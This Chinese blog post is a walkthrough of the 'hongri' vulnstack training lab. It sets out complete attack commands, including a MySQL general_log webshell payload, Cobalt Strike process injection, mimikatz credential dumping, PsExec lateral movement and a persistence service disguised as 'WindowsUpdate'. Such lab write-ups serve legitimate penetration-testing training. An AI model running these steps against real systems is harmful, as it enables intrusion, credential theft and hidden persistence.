首页 > 其他分享 >hongri靶场1

hongri靶场1

时间:2024-05-16 09:41:14浏览次数:13  
标签:web shell 主机 写入 hongri 靶场 php net

靶机分享

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

环境搭建

可以参照博客

https://blog.csdn.net/weixin_44288604/article/details/108172737

环境配置后各主机信息(仅个人)

信息收集

扫描端口

namp扫描

nmap -A -p- 192.168.20.11(web服务器的对外ip)

主机开放了两个端口,80和3306

fscan扫描,发现存在php探针界面

访问http://192.168.20.11

root/root连接mysql成功

此页面提供给我们很对信息

1、php版本和phpinfo界面

2、服务器的指纹(主机系统、apache版本)

3、数据库mysql存在弱口令

4、http明文传输

5、网站的根目录位置

扫描网站目录

dirsearch

御剑

发现存在phpmyadmin的页面,之前已经弱口令尝试了mysql的密码,直接登录

登陆成功的同时证明有phpmyadmin的漏洞,一般只有localhost才可以访问phpmyadmin的页面

入侵阶段

利用phpmyadmin页面的SQL界面写入shell

首先需要查看日志是否开启

show variables like "gengeral_log%";

通过general日志写入shell操作

1、开启日志功能

set global general_log = 'on';

2、更改日志文件位置,需要将MySQL的日志文件放在网站可以解析的地方,之前在php探针页面已经知晓网站的根目录位置

set global general_log_file = "C:\\phpstudy\\WWW\\shell.php"

3、最后向shell.php文件写入恶意代码即可

写入一句话木马

select "<?php system($_REQUEST[cmd]);?>"

 此时php一句话木马<?php system($_REQUEST[cmd]);?>已经被记录在了shell.php文件内,只需要我们访问即可

验证一下

 我们输入命令whoami

 得到

我们可以利用该漏洞为跳板对主机的信息进行勘察

执行dir文件

发现存在yxcms,是一个框架,其实之前在看到数据库的名字的时候就应该已经知道是yxcms的框架

并且beifen.rar文件应该是网站源码文件,下载后查看,发现是一个1.2.1版本的yxcms框架

访问/yxcms

在首页发现后台登录页面以及账户密码,登录后台

 成功登录网站后台

 发现在该后台的数据库管理功能点也可以使用MySQL的root权限执行语句

此web靶机getshell方式

1、利用phpmyadmin的弱口令写入日志shell

2、利用已知网站框架yxcms的历史漏洞写入shell(info.php)(自定义模版)

上线蚁剑

这里采用第一种,直接蚁剑连接,获得shell

因为蚁剑可以进行的操作不多,我们采用cobalt strike对shell主机进行上线

采用反弹shell

关于cobalt strike这个工具的使用又有许多可以讲,这里不详细展开

有兴趣的读者可以持续关注博文

上线cobalt strike

在主机的powershell.exe程序上执行cs的命令,即可上线

 这里可以看到web服务器在cs上已经上线,ip是192.168.20.11,搭载进程是powershell.exe arch为x86(说明此时拿到的shell是一个32位的,powershell.exe是一个32位的程序,后续需要提权至x64)

执行命令

sleep 0(让shell成为实时交互型)

shell whoami(查看用户,为管理员)

提权阶段

之前已经提到,拿到的shell只不过是32位,而系统是64位的(可以执行systeminfo命令查看),这说明我们还未完全拿下程序,需要进程注入与提权

我们用拿到的shell看看进程列表,或者蚁剑也可

寻找合适的64位进程注入,这里不可以选择系统进程,防止系统崩溃,那么只有everything和phpstudy,因为phpstudy存在web服务,所以我们选择everything

everything.exe进程号为2252

执行命令 inject  2252 x64,执行后会需要重新选择监听器,我们重新选择或者创建,注意端口需要与之前不同

成功上线x64位的shell,此shell将会更适合web靶机的系统

横向移动

需要探测内网存活主机,方法很多,上传fscan、nmap扫描或者net view 查看

探测到138、141主机

使用nmap扫描漏洞

 也可以使用logonpasswords(cs自带mimikzta插件)

获取明文密码Administrator/hongrisec@2024,域为GOD.ORG

这样就可以使用口令复用攻击攻击其他域内成员

cs提供PsExec来实现隧道穿透

使用psexec64链接(监听器选择beacon-smb,session选择64位的反弹shell)

 成功上现,相同方法上现另外一台主机,注意psexec是32位,否则无法连接

此时域内主机的shell已经全部到手

143即web机、138为域控主机、141是域成员

持久化攻击

当我们拿下主机权限时,渗透并不意味着结束,因为当前的主机权限并不会持久,我们需要植入木马文件进行权限维持

cs也由此功能

我们只做一个木马文件并上传至web服务器的desktop目录,并写入命令启动木马程序

 利用upload功能上传木马

并写入命令来启动木马程序

shell sc create "WindowsUpdate" binpath= "cmd /c start "C:\Users\Administrator\Desktop\artifact.exe""&&sc config "WindowsUpdate" start=auto&& start WindowsUpdate

此时,权限维持的工作也已完成

参考文章

反弹shell理解 https://blog.csdn.net/mastergu2/article/details/120975065

beacon命令 https://blog.csdn.net/weixin_40412037/article/details/126354860

lainwith博客 https://blog.csdn.net/weixin_44288604/article/details/108172737

phpmyadmin写入shell漏洞 https://blog.csdn.net/m0_47418965/article/details/121708917#t5

 

标签:web,shell,主机,写入,hongri,靶场,php,net
From: https://www.cnblogs.com/zyToJH/p/18191466

相关文章

  • UploadLabs靶场
    目录Pass-01Pass-02Pass-03Pass-04Pass-05Pass-06Pass-07Pass-08Pass-09Pass-10Pass-11Pass-12Pass-13Pass-14Pass-15Pass-16Pass-17Pass-18Pass-19Pass-20都是鄙人做题思路记下来的一些心得笔记罢了。Pass-01先传一个图片过去,成功上传。尝试传muma过去,提示失败,但是这个提......
  • 靶场合集
    1.vulnhub很多安全竞赛都有在这里面出题,系列非常之多,不仅仅有web方面的,也有系统方面的渗透。网上也有很多writeup,环境直接下载虚拟机压缩包,解压即可使用。新手朋友建议下载先自行测试,然后再看writeup解题https://vulhub.org/(在线版)https://github.com/vulhub/vulhub(离线版)2.......
  • CSRF(Pikachu靶场练习)
    CSRF(get)自己随便输点东西,回显登录失败,查看源码没发现什么点开提示,登录进去看看看到可以修改个人信息,我们把居住改成China,修改成功,没发现urlhttp://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php有变化这次我们在submit时抓包看看/pikachu/vul/csrf/csrfget/cs......
  • DC2靶场
    DC2下载地址:https://download.vulnhub.com/dc/DC-2.zip题目要求:MuchlikeDC-1,DC-2isanotherpurposelybuiltvulnerablelabforthepurposeofgainingexperienceintheworldofpenetrationtesting.AswiththeoriginalDC-1,it'sdesignedwithbeginners......
  • DC1靶场练习
    DC1下载地址:https://download.vulnhub.com/dc/DC-1.zip题目要求:DC-1isapurposelybuiltvulnerablelabforthepurposeofgainingexperienceintheworldofpenetrationtesting.Itwasdesignedtobeachallengeforbeginners,butjusthoweasyitiswillde......
  • 【攻防靶场系列】WEB LLM 学习及实操(一)
    什么是LLM❓大型语言模型(LLM)是一种AI算法,可以处理用户输入并通过预测单词序列来创建合理的响应。他们在巨大的半公开数据集上接受训练,使用机器学习来分析语言的组成部分如何组合在一起。如何检测LLM漏洞❓确定LLM(语言模型)的输入,包括直接输入(如提示)和间接输入(如训练数......
  • DHU网络攻防靶场攻击记录
    DHU网络靶场攻击记录已知:靶场入口10.199.227.xxx不完整的网络拓扑图:环境准备:kali/wsl-kali/虚拟机kali以及windows或其他操作系统的本机工具准备:Fscannmaplaravel-CVE-2021-3129-EXP-main哥斯拉Burpsuitemsfconsole(主要)目录DHU网络靶场攻击记录如何挂代理入口处机......
  • XSS漏洞靶场
    XSS漏洞靶场level1查看网站源码,发现get传参name的值test插入到了html头里面,还回显payload长度插入js代码,get传参?name=<script>alert()</script>本关小结:JS弹窗函数alert()level2貌似不对,查看下源码闭合掉双引号"><script>alert()</script><"本关小结:闭合绕过......
  • Centos7部署DVWA靶场
    Centos7部署DVWA靶场​ DVWA款开源的渗透测试漏洞练习平台,其中内含xsSQL注入、文件上传、文件包含、CSRF和暴力破解等各个难度的测试环境。安装httpd及其相关的组件yuminstall-yhttpdhttpd-devel安装php及其相关组件yum-yinstallphpphp-gdphp-ldapphp-odbc......
  • 360众测靶场考核
    前段时间参加了360众测靶场的考核,感觉还挺有意思的,难度也适中,于是记录一下解题过程。题目一共分为两个部分,第一部分是理论题,就是选择加判断,接触过web安全的应该都能过,也可以直接百度,主要记录第二部分的实操题。第一关打开网页如下图所示,直接给出了提示,struts2-013,于是直接......